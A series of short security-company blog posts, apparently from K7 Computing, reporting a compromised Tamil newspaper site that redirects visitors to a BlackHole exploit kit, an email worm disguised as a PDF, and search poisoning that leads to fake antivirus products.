“Dhina Thanthi”, “Daily Telegraph” in English, is a popular Tamil newspaper that has its online service on the domain dailythanthi.com. This site has been compromised.

A page hosting model/practice question papers, to aid the students who are to take up their board examinations in the state of Tamil Nadu, has been infected with a JavaScript that in turn loads a BlackHole Exploit. This exploits a cocktail of vulnerabilities across Windows, Java and some Adobe products, etc.

The page contains a JavaScript that in turn contacts the exploit server.

Above are network captures of dailythanthi site connecting to exploit server.

The script was unpacked, thanks to JSUnpack, and we are able to see the iframe that leads to the exploit server.

These servers haven’t been updated as of late, hence there wasn’t any infection to be acquired. But the daily thanthi site still remains compromised.

There are several such domain names hosted on a single IP.

Note the “robots.txt” in the above screenshot of the exploit server’s domain directory. This is to bypass any search bots that might stumble upon this domain from indexing it.

As for K7 users keeping your site blocker up to date would keep you at bay from threats such as this.

When the administrator of the domain from the WhoIs records was contacted we received a mailer-daemon. We then contacted the administrators of the company (interpressindia.com) that maintains the dailythanthi.com site, again it was a mailer-daemon.

As a foot note, if you were wondering what the blog title meant, it is BlackHole written in Morse code.

Kaarthik
K7 TCL

If you wish to subscribe to our blog, please add the URL provided below to your blog reader:
http://blog.k7computing.com/feed

In something of a blast from the past, an email borne worm has been sighted spreading around the internet.

Although we’ve not seen too many actual attacks from this, it’s been widely reported in the media, perhaps as it’s quite a novelty these days to see a worm spreading in this way.

It spreads itself as an executable in email, but disguises itself as a PDF file, when executed it attempts to download some other malicious files on the victim machine, and drops some files in an attempt to let the worm spread via autorun.

K7 Total Security detects this worm as  ”Emailworm (0019e4ae1)” (yeah, it’s that uninteresting!)

Full information is here:

http://viruslab.k7computing.com/index.php?option=com_k7virus&view=showvirus&Itemid=1&id=818

If you’re interested in more, Dan Goodin has written a short piece about the worm on The Register http://www.theregister.co.uk/2010/09/10/email_worm_spreading/

Andrew Lee
CTO K7 Computing

The folks who are in the business of malware are quite innovative and react with alacrity to what is happening around the world.

In recent times, the quake at Haiti was used as a lever to ask people to visit a link to help. Of course if a mail is well-crafted we tend to see how we can help and then the usual means of  exploiting are used: ranging from asking you to make a ‘small’ donation with your credit card to stealthily making you download malware.

If you are from Chennai, Tamil Nadu (INDIA), you will be aware of a sleazy scandal involving a fake godman. To cut a long story short the young godman was caught on tape in very compromising acts with an yesteryear actress–would have been nobody’s business but for the godman’s usual preaching around celibacy and how he has achieved ‘powers’ through the practice of the same.

Anyway, our interest is the fact that currently if you were to search for the name of the people involved you are being directed to pages that host Fake Anti-Virus products.

So beware, of fake swamijis and fake AVs!

Cool Rahul

The name probably brings out images of a Hindi movie or a school nickname. Well, it is Indian alright. But it is a rarity–a malware that originated out of India. (more…)